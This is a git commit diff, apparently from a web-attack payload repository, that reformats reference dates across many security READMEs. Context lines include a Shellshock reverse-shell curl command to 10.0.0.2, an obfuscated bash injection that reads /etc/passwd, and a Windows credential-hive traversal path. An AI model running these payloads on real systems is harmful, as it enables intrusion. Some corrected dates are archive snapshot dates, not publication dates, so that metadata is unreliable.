Update reference date, fix format

2026-04-28 11:33:06 -07:00 · 2026-04-22 16:04:22 +02:00
parent d4e6eda4ad
commit e961fef231
37 changed files with 85 additions and 85 deletions
--- a/Errors/README.md
+++ b/Errors/README.md
@@ -89,7 +89,7 @@ In this example, instead of rounding and rejecting or enforcing a minimum transf

 ## References

-* [Business Logic Vulnerabilities - PortSwigger - 2024](https://web.archive.org/web/20260305155804/https://portswigger.net/web-security/logic-flaws)
-* [Business Logic Vulnerability - OWASP - 2024](https://web.archive.org/web/20200422002600/https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
+* [Business Logic Vulnerabilities - PortSwigger - March 5, 2026](https://web.archive.org/web/20260305155804/https://portswigger.net/web-security/logic-flaws)
+* [Business Logic Vulnerability - OWASP - April 22, 2020](https://web.archive.org/web/20200422002600/https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
 * [CWE-840: Business Logic Errors - CWE - March 24, 2011](https://web.archive.org/web/20260304013031/https://cwe.mitre.org/data/definitions/840.html)
-* [Examples of Business Logic Vulnerabilities - PortSwigger - 2024](https://web.archive.org/web/20200922175829/https://portswigger.net/web-security/logic-flaws/examples)
+* [Examples of Business Logic Vulnerabilities - PortSwigger - September 22, 2020](https://web.archive.org/web/20200922175829/https://portswigger.net/web-security/logic-flaws/examples)
--- a/Misconfiguration/README.md
+++ b/Misconfiguration/README.md
@@ -269,6 +269,6 @@ function reqListener() {
 * [CORS Misconfigurations Explained - Detectify Blog - April 26, 2018](https://web.archive.org/web/20230323053559/https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
 * [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://web.archive.org/web/20260302141111/https://portswigger.net/web-security/cors)
 * [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://web.archive.org/web/20250512191501/https://hackerone.com/reports/235200)
-* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://web.archive.org/web/20190919034024/https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
+* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - October 14, 2016](https://web.archive.org/web/20190919034024/https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
 * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://web.archive.org/web/20260204152901/https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
-* [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://web.archive.org/web/20210126182728/https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
+* [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14, 2019](https://web.archive.org/web/20210126182728/https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -192,7 +192,7 @@ Payload example using `fontleak` with a custom selector, parent element, and alp
 * [CSS based Attack: Abusing unicode-range of @font-face - Masato Kinugawa - October 23, 2015](https://web.archive.org/web/20260212042745/https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html)
 * [CSS Data Exfiltration to Steal OAuth Token - - September 13, 2025](https://web.archive.org/web/20250601232405/https://blog.voorivex.team/css-data-exfiltration-to-steal-oauth-token)
 * [CSS Injection - xsleaks.dev - May 9, 2025](https://web.archive.org/web/20260114161847/https://xsleaks.dev/docs/attacks/css-injection/)
-* [CSS Injection Attacks or how to leak content with <style> - Pepe Vila - 2019](https://web.archive.org/web/20250928084357/https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf)
+* [CSS Injection Attacks or how to leak content with <style> - Pepe Vila - September 28, 2025](https://web.archive.org/web/20250928084357/https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf)
 * [CSS Injection: Attacking with Just CSS (Part 2) - aszx87410 - September 24, 2023](https://web.archive.org/web/20231223213409/https://aszx87410.github.io/beyond-xss/en/ch3/css-injection-2/)
 * [Fontleak: exfiltrating text using CSS and Ligatures - Dragos Albastroiu - April 16, 2025](https://web.archive.org/web/20251130021102/https://adragos.ro/fontleak/)
 * [How you can steal private data through CSS injection - invicti - April 23, 2018](https://web.archive.org/web/20251107094938/https://www.invicti.com/blog/web-security/private-data-stolen-exploiting-css-injection)
--- a/Exploits/README.md
+++ b/Exploits/README.md
@@ -78,8 +78,8 @@ curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/44

 ## References

-* [Heartbleed - Official website](https://web.archive.org/web/20260302163556/https://heartbleed.com/)
-* [Shellshock - Wikipedia](https://web.archive.org/web/20140929214920/http://en.wikipedia.org:80/wiki/Shellshock_(software_bug))
-* [Imperva Apache Struts analysis](https://web.archive.org/web/20180305002332/https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
-* [EternalBlue - Wikipedia](https://web.archive.org/web/20260304111336/https://en.wikipedia.org/wiki/EternalBlue)
-* [BlueKeep - Microsoft](https://web.archive.org/web/20201104070840/https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
+* [The Heartbleed Bug - Heartbleed - April 7, 2014](https://web.archive.org/web/20260302163556/https://heartbleed.com/)
+* [Shellshock (software bug) - Wikipedia - September 29, 2014](https://web.archive.org/web/20140929214920/http://en.wikipedia.org:80/wiki/Shellshock_(software_bug))
+* [Apache Struts Equifax Hack Analysis Part 1: CVE-2017-5638 - Imperva - March 9, 2017](https://web.archive.org/web/20180305002332/https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
+* [EternalBlue - Wikipedia - March 4, 2026](https://web.archive.org/web/20260304111336/https://en.wikipedia.org/wiki/EternalBlue)
+* [CVE-2019-0708 | Remote Desktop Services Remote Code Execution Vulnerability - Microsoft - November 4, 2020](https://web.archive.org/web/20201104070840/https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
--- a/Traversal/README.md
+++ b/Traversal/README.md
@@ -61,12 +61,12 @@ Real-World Scenarios:

 ## References

-* [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://web.archive.org/web/20260222183040/https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
-* [Exploiting Client-Side Path Traversal - CSRF is dead, long live CSRF - Whitepaper - Maxence Schmitt - 02 Jul 2024](https://web.archive.org/web/20240702212818/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf)
-* [Exploiting Client-Side Path Traversal - CSRF is Dead, Long Live CSRF - OWASP Global AppSec 2024 - Maxence Schmitt - June 24 2024](https://web.archive.org/web/20250521192653/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_OWASP_Appsec_Lisbon.pdf)
-* [Leaking Jupyter instance auth token chaining CVE-2023-39968, CVE-2024-22421 and a chromium bug - Davwwwx - 30-08-2023](https://web.archive.org/web/20240703155707/https://blog.xss.am/2023/08/cve-2023-39968-jupyter-token-leak/)
-* [On-site request forgery - Dafydd Stuttard - 03 May 2007](https://web.archive.org/web/20260212042947/https://portswigger.net/blog/on-site-request-forgery)
-* [Bypassing WAFs to Exploit CSPT Using Encoding Levels - Matan Berson - 2024-05-10](https://web.archive.org/web/20240512110749/https://matanber.com/blog/cspt-levels)
+* [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - July 2, 2024](https://web.archive.org/web/20260222183040/https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
+* [Exploiting Client-Side Path Traversal - CSRF is dead, long live CSRF - Whitepaper - Maxence Schmitt - July 2, 2024](https://web.archive.org/web/20240702212818/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf)
+* [Exploiting Client-Side Path Traversal - CSRF is Dead, Long Live CSRF - OWASP Global AppSec 2024 - Maxence Schmitt - June 24, 2024](https://web.archive.org/web/20250521192653/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_OWASP_Appsec_Lisbon.pdf)
+* [Leaking Jupyter instance auth token chaining CVE-2023-39968, CVE-2024-22421 and a chromium bug - Davwwwx - August 30, 2023](https://web.archive.org/web/20240703155707/https://blog.xss.am/2023/08/cve-2023-39968-jupyter-token-leak/)
+* [On-site request forgery - Dafydd Stuttard - May 3, 2007](https://web.archive.org/web/20260212042947/https://portswigger.net/blog/on-site-request-forgery)
+* [Bypassing WAFs to Exploit CSPT Using Encoding Levels - Matan Berson - May 10, 2024](https://web.archive.org/web/20240512110749/https://matanber.com/blog/cspt-levels)
 * [Automating Client-Side Path Traversals Discovery - Vitor Falcao - October 3, 2024](https://web.archive.org/web/20241004042613/https://vitorfalcao.com/posts/automating-cspt-discovery/)
 * [CSPT the Eval Villain Way! - Dennis Goodlett - December 3, 2024](https://web.archive.org/web/20241203171704/https://blog.doyensec.com/2024/12/03/cspt-with-eval-villain.html)
 * [Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal - Maxence Schmitt - January 9, 2025](https://web.archive.org/web/20250109093347/https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -470,7 +470,7 @@ g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
 * [Bash Obfuscation by String Manipulation - Malwrologist, @DissectMalware - August 4, 2018](https://web.archive.org/web/20241202133053/https://twitter.com/DissectMalware/status/1025604382644232192)
 * [Bug Bounty Survey - Windows RCE Spaceless - Bug Bounties Survey - May 4, 2017](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
 * [No PHP, No Spaces, No $, No {}, Bash Only - Sven Morgenroth - August 9, 2017](https://web.archive.org/web/20220428000241/https://twitter.com/asdizzle_/status/895244943526170628)
-* [OS Command Injection - PortSwigger - 2024](https://web.archive.org/web/20190330193912/https://portswigger.net/web-security/os-command-injection)
+* [OS Command Injection - PortSwigger - March 30, 2019](https://web.archive.org/web/20190330193912/https://portswigger.net/web-security/os-command-injection)
 * [SECURITY CAFÉ - Exploiting Timed-Based RCE - Pobereznicenco Dan - February 28, 2017](https://web.archive.org/web/20250108174818/https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
-* [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - kacperszurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
+* [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - Kacper Szurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
 * [WorstFit: Unveiling Hidden Transformers in Windows ANSI! - Orange Tsai - January 10, 2025](https://web.archive.org/web/20250109163006/https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/)
--- a/Forgery/README.md
+++ b/Forgery/README.md
@@ -146,17 +146,17 @@ xhr.send('{"role":admin}');

 ## References

-* [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://web.archive.org/web/20220926223539/https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
-* [Cross-Site Request Forgery (CSRF) - OWASP - Apr 19, 2024](https://web.archive.org/web/20120920091432/https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
+* [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3, 2016](https://web.archive.org/web/20220926223539/https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
+* [Cross-Site Request Forgery (CSRF) - OWASP - April 19, 2024](https://web.archive.org/web/20120920091432/https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
 * [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton - July 26, 2015](https://web.archive.org/web/20170919181010/https://whitton.io/articles/messenger-site-wide-csrf/)
-* [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial - 19 July 2016](https://web.archive.org/web/20170607102958/https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
-* [Hacking PayPal Accounts with one click (Patched) - Yasser Ali - 2014/10/09](https://web.archive.org/web/20141203184956/http://yasserali.com/hacking-paypal-accounts-with-one-click/)
+* [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial - July 19, 2016](https://web.archive.org/web/20170607102958/https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
+* [Hacking PayPal Accounts with one click (Patched) - Yasser Ali - October 9, 2014](https://web.archive.org/web/20141203184956/http://yasserali.com/hacking-paypal-accounts-with-one-click/)
 * [Add tweet to collection CSRF - Vijay Kumar (indoappsec) - November 21, 2015](https://web.archive.org/web/20250519092910/https://hackerone.com/reports/100820)
 * [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd - October 16, 2015](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/)
-* [How I Hacked Your Beats Account? Apple Bug Bounty - @aaditya_purani - 2016/07/20](https://web.archive.org/web/20250504102847/https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
+* [How I Hacked Your Beats Account? Apple Bug Bounty - Aaditya Purani (@aaditya_purani) - July 20, 2016](https://web.archive.org/web/20250504102847/https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
 * [FORM POST JSON: JSON CSRF on POST Heartbeats API - Eugene Yakovchuk - July 2, 2017](https://web.archive.org/web/20180102010752/https://hackerone.com/reports/245346)
-* [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15th, 2018](https://web.archive.org/web/20260208211335/https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
-* [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](https://web.archive.org/web/20250906213239/https://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
-* [Cross-Site Request Forgery Attack - PwnFunction - 5 Apr. 2019](https://web.archive.org/web/20251127000352/https://www.youtube.com/watch?v=eWEgUcHPle0)
-* [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://web.archive.org/web/20250727045637/https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
-* [Bypass Referer Check Logic for CSRF - hahwul - Oct 11, 2019](https://web.archive.org/web/20250719144921/https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
+* [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15, 2018](https://web.archive.org/web/20260208211335/https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
+* [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - January 9, 2019](https://web.archive.org/web/20250906213239/https://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
+* [Cross-Site Request Forgery Attack - PwnFunction - April 5, 2019](https://web.archive.org/web/20251127000352/https://www.youtube.com/watch?v=eWEgUcHPle0)
+* [Wiping Out CSRF - Joe Rozner - October 17, 2017](https://web.archive.org/web/20250727045637/https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
+* [Bypass Referer Check Logic for CSRF - hahwul - October 11, 2019](https://web.archive.org/web/20250719144921/https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
--- a/Rebinding/README.md
+++ b/Rebinding/README.md
@@ -93,4 +93,4 @@ localhost.example.com.            381     IN      CNAME   localhost.

 ## References

-* [How Do DNS Rebinding Attacks Work? - nccgroup - Apr 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)
+* [How Do DNS Rebinding Attacks Work? - NCC Group - April 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)
--- a/Clobbering/README.md
+++ b/Clobbering/README.md
@@ -138,8 +138,8 @@ Exploitation requires any kind of `HTML injection` in the page.

 ## References

- [Bypassing CSP via DOM clobbering - Gareth Heyes - 05 June 2023](https://web.archive.org/web/20251114182213/https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
+- [Bypassing CSP via DOM clobbering - Gareth Heyes - June 5, 2023](https://web.archive.org/web/20251114182213/https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
 - [DOM Clobbering - HackTricks - January 27, 2023](https://web.archive.org/web/20241215205040/https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-clobbering)
 - [DOM Clobbering - PortSwigger - September 25, 2020](https://web.archive.org/web/20260218083100/https://portswigger.net/web-security/dom-based/dom-clobbering)
- [DOM Clobbering strikes back - Gareth Heyes - 06 February 2020](https://web.archive.org/web/20200224065316/https://portswigger.net/research/dom-clobbering-strikes-back)
- [Hijacking service workers via DOM Clobbering - Gareth Heyes - 29 November 2022](https://web.archive.org/web/20260123013910/https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
+- [DOM Clobbering strikes back - Gareth Heyes - February 6, 2020](https://web.archive.org/web/20200224065316/https://portswigger.net/research/dom-clobbering-strikes-back)
+- [Hijacking service workers via DOM Clobbering - Gareth Heyes - November 29, 2022](https://web.archive.org/web/20260123013910/https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
--- a/Traversal/README.md
+++ b/Traversal/README.md
@@ -349,7 +349,7 @@ c:/windows/repair/system
 * [Directory traversal - Portswigger - March 30, 2019](https://web.archive.org/web/20190330191447/https://portswigger.net/web-security/file-path-traversal)
 * [Directory traversal attack - Wikipedia - August 5, 2024](https://web.archive.org/web/20111013162219/http://en.wikipedia.org:80/wiki/Directory_traversal_attack)
 * [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - November 30, 2023](https://web.archive.org/web/20240323234120/https://youtu.be/YlZGJ28By8U)
-* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos - 19 June 2018](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
+* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos - June 19, 2018](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
 * [NGINX may be protecting your applications from traversal attacks without you even knowing - Rotem Bar - September 24, 2020](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
 * [Path Traversal Cheat Sheet: Windows - @HollyGraceful - May 17, 2015](https://web.archive.org/web/20170123115404/https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
 * [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - June 24, 2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))
--- a/Inclusion/LFI-to-RCE.md
+++ b/Inclusion/LFI-to-RCE.md
@@ -295,9 +295,9 @@ If SSH is active, check which user is being used in the machine by including the

 ## References

- [LFI WITH PHPINFO() ASSISTANCE - Brett Moore - September 2011](https://web.archive.org/web/20170406225317/https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf)
+- [LFI WITH PHPINFO() ASSISTANCE - Brett Moore - April 6, 2017](https://web.archive.org/web/20170406225317/https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf)
 - [LFI2RCE via PHP Filters - HackTricks - July 19, 2024](https://web.archive.org/web/20220819000915/https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
 - [Local file inclusion tricks - Johan Adriaans - August 4, 2007](https://web.archive.org/web/20250403080651/http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
 - [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - Gynvael Coldwind - March 18, 2011](https://web.archive.org/web/20110429042455/http://gynvael.coldwind.pl:80/?id=376)
- [PHP LFI with Nginx Assistance - Bruno Bierbaumer - 26 Dec 2021](https://web.archive.org/web/20250604035904/https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
+- [PHP LFI with Nginx Assistance - Bruno Bierbaumer - December 26, 2021](https://web.archive.org/web/20250604035904/https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
 - [Upgrade from LFI to RCE via PHP Sessions - Reiners - September 14, 2017](https://web.archive.org/web/20170914211708/https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
--- a/Inclusion/README.md
+++ b/Inclusion/README.md
@@ -137,9 +137,9 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos

 ## References

- [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://web.archive.org/web/20200724150218/https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
- [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](https://web.archive.org/web/20260220172333/https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
- [Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris](https://web.archive.org/web/20250209181954/http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
- [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://web.archive.org/web/20180121083456/https://highon.coffee/blog/lfi-cheat-sheet/)
- [Testing for Local File Inclusion - OWASP - 25 June 2017](https://web.archive.org/web/20131021005706/https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
- [Turning LFI into RFI - Grayson Christopher - 2017-08-14](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)
+- [CVV #1: Local File Inclusion - SI9INT - June 20, 2018](https://web.archive.org/web/20200724150218/https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
+- [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - May 12, 2019](https://web.archive.org/web/20260220172333/https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
+- [Is PHP vulnerable and under what conditions? - Andreas Venieris - April 13, 2015](https://web.archive.org/web/20250209181954/http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
+- [LFI Cheat Sheet - @Arr0way - April 24, 2016](https://web.archive.org/web/20180121083456/https://highon.coffee/blog/lfi-cheat-sheet/)
+- [Testing for Local File Inclusion - OWASP - June 25, 2017](https://web.archive.org/web/20131021005706/https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
+- [Turning LFI into RFI - Grayson Christopher - August 14, 2017](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)
--- a/Inclusion/Wrappers.md
+++ b/Inclusion/Wrappers.md
@@ -263,7 +263,7 @@ code remote.py # edit Remote.oracle

 ## References

- [Baby^H Master PHP 2017 - Orange Tsai (@orangetw) - Dec 5, 2021](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
+- [Baby^H Master PHP 2017 - Orange Tsai (@orangetw) - December 5, 2021](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
 - [Iconv, set the charset to RCE: exploiting the libc to hack the php engine (part 1) - Charles Fol - May 27, 2024](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)
 - [Introducing lightyear: a new way to dump PHP files - Charles Fol - November 4, 2024](https://web.archive.org/web/20250809094219/https://www.ambionics.io/blog/lightyear-file-dump)
 - [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - December 11, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
@@ -272,4 +272,4 @@ code remote.py # edit Remote.oracle
 - [OffensiveCon24 - Charles Fol- Iconv, Set the Charset to RCE - June 14, 2024](https://youtu.be/dqKFHjcK9hM)
 - [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - March 21, 2023](https://web.archive.org/web/20260228090126/https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
 - [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - October 18, 2022](https://web.archive.org/web/20260212042712/https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
- [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop - December 30, 2021](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
+- [Solving "includer's revenge" from hxp CTF 2021 without controlling any files - @loknop - December 30, 2021](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -479,17 +479,17 @@ query {
 - [Exploiting GraphQL - AssetNote - Shubham Shah - August 29, 2021](https://web.archive.org/web/20210830161635/https://blog.assetnote.io/2021/08/29/exploiting-graphql/)
 - [GraphQL Batching Attack - Wallarm - December 13, 2019](https://web.archive.org/web/20260223043402/https://lab.wallarm.com/graphql-batching-attack/)
 - [GraphQL for Pentesters presentation - Alexandre ZANNI (@noraj) - December 1, 2022](https://web.archive.org/web/20230205233412/https://acceis.github.io/prez-graphql/)
- [API Hacking GraphQL - @ghostlulz - Jun 8, 2019](https://web.archive.org/web/20190619040847/https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
- [Discovering GraphQL endpoints and SQLi vulnerabilities - Matías Choren - Sep 23, 2018](https://web.archive.org/web/20180923085151/https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
+- [API Hacking GraphQL - @ghostlulz - June 8, 2019](https://web.archive.org/web/20190619040847/https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
+- [Discovering GraphQL endpoints and SQLi vulnerabilities - Matías Choren - September 23, 2018](https://web.archive.org/web/20180923085151/https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
 - [GraphQL abuse: Bypass account level permissions through parameter smuggling - Jon Bottarini - March 14, 2018](https://web.archive.org/web/20231027032512/https://labs.detectify.com/2018/03/14/graphql-abuse/)
- [Graphql Bug to Steal Anyone's Address - Pratik Yadav - Sept 1, 2019](https://web.archive.org/web/20250514221822/https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
+- [Graphql Bug to Steal Anyone's Address - Pratik Yadav - September 1, 2019](https://web.archive.org/web/20250514221822/https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
 - [GraphQL cheatsheet - devhints.io - November 7, 2018](https://web.archive.org/web/20181107093033/https://devhints.io/graphql)
 - [GraphQL Introspection - GraphQL - August 21, 2024](https://web.archive.org/web/20260302160506/https://graphql.org/learn/introspection/)
 - [GraphQL NoSQL Injection Through JSON Types - Pete Corey - June 12, 2017](https://web.archive.org/web/20250514221852/https://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/)
 - [HIP19 Writeup - Meet Your Doctor 1,2,3 - Swissky - June 22, 2019](https://web.archive.org/web/20190825033521/https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
- [How to set up a GraphQL Server using Node.js, Express & MongoDB - Leonardo Maldonado - 5 November 2018](https://web.archive.org/web/20190718023950/https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
+- [How to set up a GraphQL Server using Node.js, Express & MongoDB - Leonardo Maldonado - November 5, 2018](https://web.archive.org/web/20190718023950/https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
 - [Introduction to GraphQL - GraphQL - November 1, 2024](https://web.archive.org/web/20160917011216/http://graphql.org:80/learn)
 - [Introspection query leaks sensitive graphql system information - @Zuriel - November 18, 2017](https://web.archive.org/web/20250710175416/https://hackerone.com/reports/291531)
- [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r - 8 June 2017](https://web.archive.org/web/20170608142208/https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
- [Securing Your GraphQL API from Malicious Queries - Max Stoiber - Feb 21, 2018](https://web.archive.org/web/20180731231915/https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
- [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Jobert Abma (jobert) - Nov 6th 2018](https://web.archive.org/web/20181203004543/https://hackerone.com/reports/435066)
+- [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r - June 8, 2017](https://web.archive.org/web/20170608142208/https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
+- [Securing Your GraphQL API from Malicious Queries - Max Stoiber - February 21, 2018](https://web.archive.org/web/20180731231915/https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
+- [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Jobert Abma (jobert) - November 6, 2018](https://web.archive.org/web/20181203004543/https://hackerone.com/reports/435066)
--- a/Deserialization/Java.md
+++ b/Deserialization/Java.md
@@ -302,7 +302,7 @@ Common secrets from the [documentation](https://cwiki.apache.org/confluence/disp
